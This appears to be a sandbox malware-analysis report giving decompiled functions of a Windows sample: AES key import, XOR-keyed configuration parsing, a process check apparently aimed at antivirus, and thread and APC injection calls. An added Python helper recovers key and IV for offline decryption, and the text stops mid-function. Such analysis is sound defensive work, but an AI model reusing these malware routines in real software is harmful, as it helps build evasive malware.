                      				// CryptImportKey with a 0x1C-byte blob (BLOBHEADER 8 + cbKey 4 + 16-byte key),
                      				// CryptSetKeyParam(KP_IV = 1) with the 16 bytes copied by memcpy
                      				_t13 = E02BD1508( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
                      				if(_t13 == 0) {
                      					_t21 = E02BD33DC(_a8 + _a8); // RtlAllocateHeap, twice the input length
                      					if(_t21 != 0) {
                      						E02BD22EA(_a4, _t21, _t23); // produces the output buffer from the input
                      					}
                      					E02BD61DA(_a4); // releases the input-side state
                      				}
                      				return _t21;
                      			}
                      Statement addresses (one per decompiled statement, in order; side column collapsed):
                      0x02bd506b 0x02bd5072 0x02bd5074 0x02bd5083 0x02bd508a 0x02bd5099 0x02bd509d 0x02bd50a4
                      0x02bd50a4 0x02bd50ac 0x02bd50b1 0x02bd50b6

                      APIs
                      • lstrlen.KERNEL32(00000000,00000000,02BD3ECE,00000000,?,02BD66D9,00000000,02BD3ECE,?,775EC740,02BD3ECE,00000000,035B9600), ref: 02BD5074
                        • Part of subcall function 02BD1508: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,02BD5088,00000001,02BD3ECE,00000000), ref: 02BD1540
                        • Part of subcall function 02BD1508: memcpy.NTDLL(02BD5088,02BD3ECE,00000010,?,?,?,02BD5088,00000001,02BD3ECE,00000000,?,02BD66D9,00000000,02BD3ECE,?,775EC740), ref: 02BD1559
                        • Part of subcall function 02BD1508: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 02BD1582
                        • Part of subcall function 02BD1508: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 02BD159A
                        • Part of subcall function 02BD1508: memcpy.NTDLL(00000000,775EC740,035B9600,00000010), ref: 02BD15EC
                        • Part of subcall function 02BD33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02BD62F6), ref: 02BD33E8
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                      • String ID:
                      • API String ID: 894908221-0
                      • Opcode ID: 5d81167579f009319038f48e7a531b860051cb663fb425ce53ca30f2e5f6175b
                      • Instruction ID: fbd9f0383eb0da341be949741aa640b73125908d96cbcd39eee7a82a24963afc
                      • Opcode Fuzzy Hash: 5d81167579f009319038f48e7a531b860051cb663fb425ce53ca30f2e5f6175b
                      • Instruction Fuzzy Hash: 75F05E76100508BBCF216E59DC00DDA3BAEEF843A4B408062FD1DCA010EB31DA559FA0
                      Uniqueness

                      Uniqueness Score: -1.00%
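The argument values listed for E02BD1508 pin down the CryptoAPI setup: dwProvType 0x18 is PROV_RSA_AES, dwFlags 0xF0000000 is CRYPT_VERIFYCONTEXT, the CryptImportKey blob is 0x1C bytes, which is an 8-byte BLOBHEADER plus a 4-byte cbKey plus a 16-byte key, and CryptSetKeyParam with dwParam 1 (KP_IV) installs a 16-byte IV; with KP_MODE left at its default the key operates in CBC mode. The Python below is an added example, not code from the report or from the sample: it builds and parses such a blob and turns the two buffers into the (algorithm, key, IV, mode) tuple an offline decryptor needs. The report does not show the blob's aiKeyAlg, so the constructed example assumes CALG_AES_128; the key and IV bytes are made up.

```python
import struct

# wincrypt.h constants behind the argument values listed for E02BD1508
PROV_RSA_AES = 0x18               # CryptAcquireContextW dwProvType
CRYPT_VERIFYCONTEXT = 0xF0000000  # CryptAcquireContextW dwFlags: ephemeral, no key container
PLAINTEXTKEYBLOB = 0x8            # BLOBHEADER.bType for a raw symmetric key
CUR_BLOB_VERSION = 2              # BLOBHEADER.bVersion
KP_IV = 1                         # CryptSetKeyParam dwParam
BLOB_HEADER_LEN = 12              # BLOBHEADER (8) + DWORD cbKey (4)
CALG_NAMES = {
    0x6601: "CALG_DES", 0x6602: "CALG_RC2", 0x6603: "CALG_3DES", 0x6801: "CALG_RC4",
    0x660E: "CALG_AES_128", 0x660F: "CALG_AES_192", 0x6610: "CALG_AES_256",
}
AES_KEY_LEN = {"CALG_AES_128": 16, "CALG_AES_192": 24, "CALG_AES_256": 32}
# Assumption for the constructed example: the sample's BLOBHEADER.aiKeyAlg is not in the report.
CALG_AES_128 = 0x660E


def build_plaintext_key_blob(key, alg=CALG_AES_128):
    """Lay out the PLAINTEXTKEYBLOB that CryptImportKey expects for a raw symmetric key."""
    header = struct.pack("<BBHI", PLAINTEXTKEYBLOB, CUR_BLOB_VERSION, 0, alg)
    return header + struct.pack("<I", len(key)) + bytes(key)


def parse_plaintext_key_blob(blob):
    """Inverse of build_plaintext_key_blob, with the consistency checks CryptImportKey applies.
    A 0x1C-byte blob, as passed by the sample, can only carry a 16-byte key."""
    if len(blob) < BLOB_HEADER_LEN:
        raise ValueError("blob shorter than BLOBHEADER + cbKey")
    btype, bver, _reserved, alg = struct.unpack_from("<BBHI", blob, 0)
    if btype != PLAINTEXTKEYBLOB or bver != CUR_BLOB_VERSION:
        raise ValueError("not a version-2 PLAINTEXTKEYBLOB")
    cbkey = struct.unpack_from("<I", blob, 8)[0]
    if BLOB_HEADER_LEN + cbkey != len(blob):
        raise ValueError("cbKey %d does not match blob length %d" % (cbkey, len(blob)))
    return alg, blob[BLOB_HEADER_LEN:]


def cryptoapi_material(key_blob, iv):
    """Map the two buffers the sample hands to CryptoAPI (the 0x1C-byte CryptImportKey blob and
    the 16 bytes set through KP_IV) to the parameters of an offline decryptor. A block-cipher
    key whose KP_MODE is never changed runs in CBC, CryptoAPI's default."""
    alg, key = parse_plaintext_key_blob(key_blob)
    name = CALG_NAMES.get(alg)
    if name is None:
        raise ValueError("unknown CALG 0x%x" % alg)
    if name in AES_KEY_LEN:
        if len(key) != AES_KEY_LEN[name]:
            raise ValueError("%s needs a %d-byte key" % (name, AES_KEY_LEN[name]))
        if len(iv) != 16:
            raise ValueError("AES IV must be 16 bytes")
    return {"alg": name, "key": bytes(key), "iv": bytes(iv), "mode": "CBC"}
```

When the key material is recovered from a memory dump, the 16 key bytes sit at offset 12 of the buffer passed to CryptImportKey and the IV is the 16-byte buffer passed to CryptSetKeyParam; aiKeyAlg at offset 4 of the blob tells you which cipher to configure.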

                      APIs
                        • Part of subcall function 021912DC: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,02190F70), ref: 021912EB
                        • Part of subcall function 021912DC: GetVersion.KERNEL32(?,02190F70), ref: 021912FA
                        • Part of subcall function 021912DC: GetCurrentProcessId.KERNEL32(?,02190F70), ref: 02191316
                        • Part of subcall function 021912DC: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,02190F70), ref: 0219132F
                        • Part of subcall function 0219085A: RtlAllocateHeap.NTDLL(00000000,?,02190784), ref: 02190866
                      • NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 02190F9A
                      • Sleep.KERNEL32(00000000,00000030), ref: 02190FE1
                      • GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004), ref: 02191009
                      • GetSystemDefaultUILanguage.KERNEL32 ref: 02191013
                      • VerLanguageNameA.KERNEL32(?,?,00000004), ref: 02191026
                      • CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 0219109B
                      • QueueUserAPC.KERNEL32(0040139F,00000000,?), ref: 021910B1
                      • GetLastError.KERNEL32 ref: 021910C1
                      • TerminateThread.KERNEL32(00000000,00000000), ref: 021910CB
                      • SetLastError.KERNEL32(00000000), ref: 021910D7
                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 021910E4
                      • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 021910F6
                      • GetLastError.KERNEL32 ref: 02191101
                      • GetLastError.KERNEL32 ref: 02191112
                      Memory Dump Source
                      • Source File: 00000000.00000002.569302533.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2190000_server.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLast$Thread$CreateLanguageProcessSystem$AllocateCodeCurrentDefaultEventExitHeapInfoInformationLocaleNameObjectOpenQueryQueueSingleSleepTerminateUserVersionWait
                      • String ID:
                      • API String ID: 1666582358-0
                      • Opcode ID: 2f7a3bb356b8b54c1b3c7e8ff32702db1cbd6d7b6564eab963341c519062ef97
                      • Instruction ID: 1ba53e60dfea5b9ba8137b6b4bbc4e3c098f89ba7a97a810fb1d2f2dcfb638e0
                      • Opcode Fuzzy Hash: 2f7a3bb356b8b54c1b3c7e8ff32702db1cbd6d7b6564eab963341c519062ef97
                      • Instruction Fuzzy Hash: FD51AD71941215BBEF20AFB59D48AAFBA7CEB48752F104136E915E3140D735CA808FA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 93%
                      			E02BD1D8A(void* __ebx, int* __ecx, void* __edx, void* __edi, void* __esi) {
                      				int _v8;
                      				void* _v12;
                      				void* _v16;
                      				signed int _t28;
                      				signed int _t33;
                      				signed int _t39;
                      				char* _t45;
                      				char* _t46;
                      				char* _t47;
                      				char* _t48;
                      				char* _t49;
                      				char* _t50;
                      				void* _t51;
                      				void* _t52;
                      				void* _t53;
                      				intOrPtr _t54;
                      				void* _t56;
                      				intOrPtr _t57;
                      				intOrPtr _t58;
                      				signed int _t61;
                      				intOrPtr _t64;
                      				signed int _t65;
                      				signed int _t70;
                      				void* _t72;
                      				void* _t73;
                      				signed int _t75;
                      				signed int _t78;
                      				signed int _t82;
                      				signed int _t86;
                      				signed int _t90;
                      				signed int _t94;
                      				signed int _t98;
                      				void* _t101;
                      				void* _t102;
                      				void* _t116;
                      				void* _t119;
                      				intOrPtr _t122;
                      
                      				_t119 = __esi;
                      				_t116 = __edi;
                      				_t104 = __ecx;
                      				_t101 = __ebx;
                      				_t28 =  *0x2bda344; // 0x43175ac3, per-sample key: every item id below is stored as (key ^ id)
                      				// E02BD10F8(&data, &size, id) looks up an embedded item; the first one is kept only if it is at least 0x110 bytes
                      				if(E02BD10F8( &_v8,  &_v12, _t28 ^ 0xa23f04a7) != 0 && _v12 >= 0x110) {
                      					 *0x2bda374 = _v8;
                      				}
                      				_t33 =  *0x2bda344; // 0x43175ac3
                      				if(E02BD10F8( &_v16,  &_v12, _t33 ^ 0x2bfce340) == 0) {
                      					_v12 = 2; // ERROR_FILE_NOT_FOUND: the second item is mandatory
                      					L69:
                      					return _v12;
                      				}
                      				_t39 =  *0x2bda344; // 0x43175ac3
                      				_push(_t116);
                      				if(E02BD10F8( &_v12,  &_v8, _t39 ^ 0xcca68722) == 0) {
                      					L67:
                      					HeapFree( *0x2bda2d8, 0, _v16); // common exit: frees the second item and returns _v12
                      					goto L69;
                      				} else {
                      					_push(_t101);
                      					_t102 = _v12; // third item: the parameter block queried below
                      					if(_t102 == 0) {
                      						_t45 = 0;
                      					} else {
                      						_t98 =  *0x2bda344; // 0x43175ac3
                      						// E02BD36C5(ctx, block, key ^ name-id) returns the value string of one parameter;
                      						// the lookup-then-StrToIntExA pattern is repeated for each numeric setting that follows
                      						_t45 = E02BD36C5(_t104, _t102, _t98 ^ 0x523046bc);
                      					}
                      					_push(_t119);
                      					if(_t45 != 0) {
                      						_t104 =  &_v8;
                      						if(StrToIntExA(_t45, 0,  &_v8) != 0) { // 0 = STIF_DEFAULT, decimal only
                      							 *0x2bda2e0 = _v8;
                      						}
                      					}
                      					if(_t102 == 0) {
                      						_t46 = 0;
                      					} else {
                      						_t94 =  *0x2bda344; // 0x43175ac3
                      						_t46 = E02BD36C5(_t104, _t102, _t94 ^ 0x0b3e0d40);
                      					}
                      					if(_t46 != 0) {
                      						_t104 =  &_v8;
                      						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                      							 *0x2bda2e4 = _v8;
                      						}
                      					}
                      					if(_t102 == 0) {
                      						_t47 = 0;
                      					} else {
                      						_t90 =  *0x2bda344; // 0x43175ac3
                      						_t47 = E02BD36C5(_t104, _t102, _t90 ^ 0x1b5903e6);
                      					}
                      					if(_t47 != 0) {
                      						_t104 =  &_v8;
                      						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                      							 *0x2bda2e8 = _v8;
                      						}
                      					}
                      					if(_t102 == 0) {
                      						_t48 = 0;
                      					} else {
                      						_t86 =  *0x2bda344; // 0x43175ac3
                      						_t48 = E02BD36C5(_t104, _t102, _t86 ^ 0x267c2349);
                      					}
                      					if(_t48 != 0) {
                      						_t104 =  &_v8;
                      						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
                      							 *0x2bda004 = _v8;
                      						}
                      					}
                      					if(_t102 == 0) {
                      						_t49 = 0;
                      					} else {
                      						_t82 =  *0x2bda344; // 0x43175ac3
                      						_t49 = E02BD36C5(_t104, _t102, _t82 ^ 0x167db74c);
                      					}
                      					if(_t49 != 0) {
                      						_t104 =  &_v8;
                      						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
                      							 *0x2bda02c = _v8;
                      						}
                      					}
                      					if(_t102 == 0) {
                      						_t50 = 0;
                      					} else {
                      						_t78 =  *0x2bda344; // 0x43175ac3
                      						_t50 = E02BD36C5(_t104, _t102, _t78 ^ 0x02ddbcae);
                      					}
                      					if(_t50 == 0) {
                      						L41:
                      						 *0x2bda2ec = 5; // default when the parameter is absent or parses to 0
                      						goto L42;
                      					} else {
                      						_t104 =  &_v8;
                      						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
                      							goto L41;
                      						} else {
                      							L42:
                      							if(_t102 == 0) {
                      								_t51 = 0;
                      							} else {
                      								_t75 =  *0x2bda344; // 0x43175ac3
                      								_t51 = E02BD36C5(_t104, _t102, _t75 ^ 0x0cbf33fd);
                      							}
                      							if(_t51 != 0) {
                      								_push(_t51);
                      								_t72 = 0x10;
                      								_t73 = E02BD5B85(_t72);
                      								if(_t73 != 0) {
                      									_push(_t73);
                      									E02BD607C();
                      								}
                      							}
                      							if(_t102 == 0) {
                      								_t52 = 0;
                      							} else {
                      								_t70 =  *0x2bda344; // 0x43175ac3
                      								_t52 = E02BD36C5(_t104, _t102, _t70 ^ 0x93710135);
                      							}
                      							if(_t52 != 0 && E02BD5B85(0, _t52) != 0) {
                      								_t122 =  *0x2bda3cc; // 0x35b9600
                      								E02BD5364(_t122 + 4, _t68);
                      							}
                      							if(_t102 == 0) {
                      								_t53 = 0;
                      							} else {
                      								_t65 =  *0x2bda344; // 0x43175ac3
                      								_t53 = E02BD36C5(_t104, _t102, _t65 ^ 0x175474b7);
                      							}
                      							if(_t53 == 0) {
                      								L59:
                      								_t54 =  *0x2bda348; // 0x9dd5a8
                      								_t22 = _t54 + 0x2bdb5f3; // 0x616d692f = bytes "/ima": built-in default string
                      								 *0x2bda370 = _t22;
                      								goto L60;
                      							} else {
                      								_t64 = E02BD5B85(0, _t53);
                      								 *0x2bda370 = _t64;
                      								if(_t64 != 0) {
                      									L60:
                      									if(_t102 == 0) {
                      										_t56 = 0;
                      									} else {
                      										_t61 =  *0x2bda344; // 0x43175ac3
                      										_t56 = E02BD36C5(_t104, _t102, _t61 ^ 0xf8a29dde);
                      									}
                      									if(_t56 == 0) {
                      										_t57 =  *0x2bda348; // 0x9dd5a8
                      										_t23 = _t57 + 0x2bdb899; // 0x6976612e = bytes ".avi": built-in default string
                      										_t58 = _t23;
                      									} else {
                      										_t58 = E02BD5B85(0, _t56);
                      									}
                      									 *0x2bda3e0 = _t58;
                      									HeapFree( *0x2bda2d8, 0, _t102); // parameter block no longer needed
                      									_v12 = 0; // success
                      									goto L67;
                      								}
                      								goto L59;
                      							}
                      						}
                      					}
                      				}
                      			}
                      Statement addresses (one per decompiled statement, in order; side column collapsed):
                      0x02bd1d8a 0x02bd1d8a 0x02bd1d8a 0x02bd1d8a 0x02bd1d8d 0x02bd1daa 0x02bd1db8 0x02bd1db8
                      0x02bd1dbd 0x02bd1dd7 0x02bd2045 0x02bd204c 0x02bd2050 0x02bd2050 0x02bd1ddd 0x02bd1de2
                      0x02bd1dfa 0x02bd2032 0x02bd203c 0x00000000 0x02bd1e00 0x02bd1e00 0x02bd1e01 0x02bd1e06
                      0x02bd1e1c 0x02bd1e08 0x02bd1e08 0x02bd1e15 0x02bd1e15 0x02bd1e1e 0x02bd1e27 0x02bd1e29
                      0x02bd1e33 0x02bd1e38 0x02bd1e38 0x02bd1e33 0x02bd1e3f 0x02bd1e55 0x02bd1e41 0x02bd1e41
                      0x02bd1e4e 0x02bd1e4e 0x02bd1e59 0x02bd1e5b 0x02bd1e65 0x02bd1e6a 0x02bd1e6a 0x02bd1e65
                      0x02bd1e71 0x02bd1e87 0x02bd1e73 0x02bd1e73 0x02bd1e80 0x02bd1e80 0x02bd1e8b 0x02bd1e8d
                      0x02bd1e97 0x02bd1e9c 0x02bd1e9c 0x02bd1e97 0x02bd1ea3 0x02bd1eb9 0x02bd1ea5 0x02bd1ea5
                      0x02bd1eb2 0x02bd1eb2 0x02bd1ebd 0x02bd1ebf 0x02bd1ec9 0x02bd1ece 0x02bd1ece 0x02bd1ec9
                      0x02bd1ed5 0x02bd1eeb 0x02bd1ed7 0x02bd1ed7 0x02bd1ee4 0x02bd1ee4 0x02bd1eef 0x02bd1ef1
                      0x02bd1efb 0x02bd1f00 0x02bd1f00 0x02bd1efb 0x02bd1f07 0x02bd1f1d 0x02bd1f09 0x02bd1f09
                      0x02bd1f16 0x02bd1f16 0x02bd1f21 0x02bd1f34 0x02bd1f34 0x00000000 0x02bd1f23 0x02bd1f23
                      0x02bd1f2d 0x00000000 0x02bd1f3e 0x02bd1f3e 0x02bd1f40 0x02bd1f56 0x02bd1f42 0x02bd1f42
                      0x02bd1f4f 0x02bd1f4f 0x02bd1f5a 0x02bd1f5c 0x02bd1f5f 0x02bd1f60 0x02bd1f67 0x02bd1f69
                      0x02bd1f6a 0x02bd1f6a 0x02bd1f67 0x02bd1f71 0x02bd1f87 0x02bd1f73 0x02bd1f73 0x02bd1f80
                      0x02bd1f80 0x02bd1f8b 0x02bd1f99 0x02bd1fa3 0x02bd1fa3 0x02bd1fab 0x02bd1fc1 0x02bd1fad
                      0x02bd1fad 0x02bd1fba 0x02bd1fba 0x02bd1fc5 0x02bd1fd8 0x02bd1fd8 0x02bd1fdd 0x02bd1fe3
                      0x00000000 0x02bd1fc7 0x02bd1fca 0x02bd1fcf 0x02bd1fd6 0x02bd1fe8 0x02bd1fea 0x02bd2000
                      0x02bd1fec 0x02bd1fec 0x02bd1ff9 0x02bd1ff9 0x02bd2004 0x02bd2010 0x02bd2015 0x02bd2015
                      0x02bd2006 0x02bd2009 0x02bd2009 0x02bd2023 0x02bd2028 0x02bd202e 0x00000000 0x02bd2031
                      0x00000000 0x02bd1fd6 0x02bd1fc5 0x02bd1f2d 0x02bd1f21

                      APIs
                      • StrToIntExA.SHLWAPI(00000000,00000000,?,02BDA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02BD1E2F
                      • StrToIntExA.SHLWAPI(00000000,00000000,?,02BDA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02BD1E61
                      • StrToIntExA.SHLWAPI(00000000,00000000,?,02BDA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02BD1E93
                      • StrToIntExA.SHLWAPI(00000000,00000000,?,02BDA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02BD1EC5
                      • StrToIntExA.SHLWAPI(00000000,00000000,?,02BDA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02BD1EF7
                      • StrToIntExA.SHLWAPI(00000000,00000000,?,02BDA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02BD1F29
                      • HeapFree.KERNEL32(00000000,?,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?,?), ref: 02BD2028
                      • HeapFree.KERNEL32(00000000,?,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?,?), ref: 02BD203C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: FreeHeap
                      • String ID: Uqt
                      • API String ID: 3298025750-2320327147
                      • Opcode ID: 220abe7a458d34f564f6ae2067be5d746506b7e8e00086ea9456f6ad64d6f806
                      • Instruction ID: e3b5ae1bfc1a53cadaa4f92913d0cd82f843d54a4e04713579a7ad69c93f3054
                      • Opcode Fuzzy Hash: 220abe7a458d34f564f6ae2067be5d746506b7e8e00086ea9456f6ad64d6f806
                      • Instruction Fuzzy Hash: 5A81CDB4E21204ABCB10EBB8CD94DEB7BFEEB487547684DA5E409D3204FB75D9408B20
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 68%
                      			E02BD30D5() {
                      				char _v264;
                      				void* _v300;
                      				int _t8;
                      				intOrPtr _t9;
                      				int _t15;
                      				void* _t17;
                      
                      				_t15 = 0; // result: 1 if a process with the searched name is running
                      				_t17 = CreateToolhelp32Snapshot(2, 0); // TH32CS_SNAPPROCESS
                      				if(_t17 != 0) {
                      					_t8 = Process32First(_t17,  &_v300); // _v300: PROCESSENTRY32
                      					while(_t8 != 0) {
                      						_t9 =  *0x2bda348; // 0x9dd5a8
                      						_t2 = _t9 + 0x2bdbe88; // 0x73617661 = bytes "avas", start of the process name searched for
                      						_push( &_v264); // &_v300 + 36 = PROCESSENTRY32.szExeFile
                      						if( *0x2bda12c() != 0) { // runtime-resolved function pointer, presumably matching szExeFile against that string
                      							_t15 = 1;
                      						} else {
                      							_t8 = Process32Next(_t17,  &_v300);
                      							continue;
                      						}
                      						L7:
                      						CloseHandle(_t17); // reached on a match or once the list is exhausted
                      						goto L8;
                      					}
                      					goto L7;
                      				}
                      				L8:
                      				return _t15;
                      			}
                      Statement addresses (one per decompiled statement, in order; side column collapsed):
                      0x02bd30e0 0x02bd30ea 0x02bd30ee 0x02bd30f8 0x02bd3129 0x02bd30ff 0x02bd3104 0x02bd3111
                      0x02bd311a 0x02bd3131 0x02bd311c 0x02bd3124 0x00000000 0x02bd3124 0x02bd3132 0x02bd3133
                      0x00000000 0x02bd3133 0x00000000 0x02bd312d 0x02bd3139 0x02bd313e

                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02BD30E5
                      • Process32First.KERNEL32(00000000,?), ref: 02BD30F8
                      • Process32Next.KERNEL32(00000000,?), ref: 02BD3124
                      • CloseHandle.KERNEL32(00000000), ref: 02BD3133
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                      • String ID:
                      • API String ID: 420147892-0
                      • Opcode ID: c19e64eba2362a2bb885c5aae4729e96459684928a96e2b75292d469c4e8b1c3
                      • Instruction ID: 5e2ba48cc35e59ccb107e8ef60cab56c3b51c534f0b0ca2439af2541ade9c108
                      • Opcode Fuzzy Hash: c19e64eba2362a2bb885c5aae4729e96459684928a96e2b75292d469c4e8b1c3
                      • Instruction Fuzzy Hash: D7F0BB365015555BD720A676DC4AFDB77EDDBC5350F0100E1EA45C3002FB20C5D9CE62
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00401D68() {
                      				void* _t1;
                      				unsigned int _t3;
                      				void* _t4;
                      				long _t5;
                      				void* _t6;
                      				intOrPtr _t10;
                      				void* _t14;
                      
                      				_t10 =  *0x404170;
                      				_t1 = CreateEventA(0, 1, 0, 0);
                      				 *0x40417c = _t1;
                      				if(_t1 == 0) {
                      					return GetLastError();
                      				}
                      				_t3 = GetVersion();
                      				if(_t3 != 5) {
                      					L4:
                      					if(_t14 <= 0) {
                      						_t4 = 0x32;
                      						return _t4;
                      					} else {
                      						goto L5;
                      					}
                      				} else {
                      					if(_t3 >> 8 > 0) {
                      						L5:
                      						 *0x40416c = _t3;
                      						_t5 = GetCurrentProcessId();
                      						 *0x404168 = _t5;
                      						 *0x404170 = _t10;
                      						_t6 = OpenProcess(0x10047a, 0, _t5);
                      						 *0x404164 = _t6;
                      						if(_t6 == 0) {
                      							 *0x404164 =  *0x404164 | 0xffffffff;
                      						}
                      						return 0;
                      					} else {
                      						_t14 = _t3 - _t3;
                      						goto L4;
                      					}
                      				}
                      			}

                      APIs
                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77
                      • GetVersion.KERNEL32 ref: 00401D86
                      • GetCurrentProcessId.KERNEL32 ref: 00401DA2
                      • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB
                      Memory Dump Source
                      • Source File: 00000000.00000002.568999225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.568999225.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.568999225.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.568999225.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_server.jbxd
                      Similarity
                      • API ID: Process$CreateCurrentEventOpenVersion
                      • String ID:
                      • API String ID: 845504543-0
                      • Opcode ID: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
                      • Instruction ID: a5005e0615366c288a960c89f9170266babf83a3c5a8d8e9540ac284067a1926
                      • Opcode Fuzzy Hash: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
                      • Instruction Fuzzy Hash: 79F0AFB05813009BE7509F78BE0DB563F64AB95712F000036E601FA2F8D7709982CB5C
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00401000(void* __edi, intOrPtr _a4) {
                      				signed int _v8;
                      				intOrPtr* _v12;
                      				_Unknown_base(*)()** _v16;
                      				signed int _v20;
                      				signed short _v24;
                      				struct HINSTANCE__* _v28;
                      				intOrPtr _t43;
                      				intOrPtr* _t45;
                      				intOrPtr _t46;
                      				struct HINSTANCE__* _t47;
                      				intOrPtr* _t49;
                      				intOrPtr _t50;
                      				signed short _t51;
                      				_Unknown_base(*)()* _t53;
                      				CHAR* _t54;
                      				_Unknown_base(*)()* _t55;
                      				void* _t58;
                      				signed int _t59;
                      				_Unknown_base(*)()* _t60;
                      				intOrPtr _t61;
                      				intOrPtr _t65;
                      				signed int _t68;
                      				void* _t69;
                      				CHAR* _t71;
                      				signed short* _t73;
                      
                      				_t69 = __edi;
                      				_v20 = _v20 & 0x00000000;
                      				_t59 =  *0x404180;
                      				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x18bad598));
                      				if(_t43 != 0) {
                      					_t45 = _t43 + __edi;
                      					_v12 = _t45;
                      					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                      					if(_t46 != 0) {
                      						while(1) {
                      							_t71 = _t46 + _t69;
                      							_t47 = LoadLibraryA(_t71);
                      							_v28 = _t47;
                      							if(_t47 == 0) {
                      								break;
                      							}
                      							_v24 = _v24 & 0x00000000;
                      							 *_t71 = _t59 - 0x43175ac3;
                      							_t49 = _v12;
                      							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                      							_t50 =  *_t49;
                      							if(_t50 != 0) {
                      								L6:
                      								_t73 = _t50 + _t69;
                      								_v16 = _t61 + _t69;
                      								while(1) {
                      									_t51 =  *_t73;
                      									if(_t51 == 0) {
                      										break;
                      									}
                      									if(__eflags < 0) {
                      										__eflags = _t51 - _t69;
                      										if(_t51 < _t69) {
                      											L12:
                      											_t21 =  &_v8;
                      											 *_t21 = _v8 & 0x00000000;
                      											__eflags =  *_t21;
                      											_v24 =  *_t73 & 0x0000ffff;
                      										} else {
                      											_t65 = _a4;
                      											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
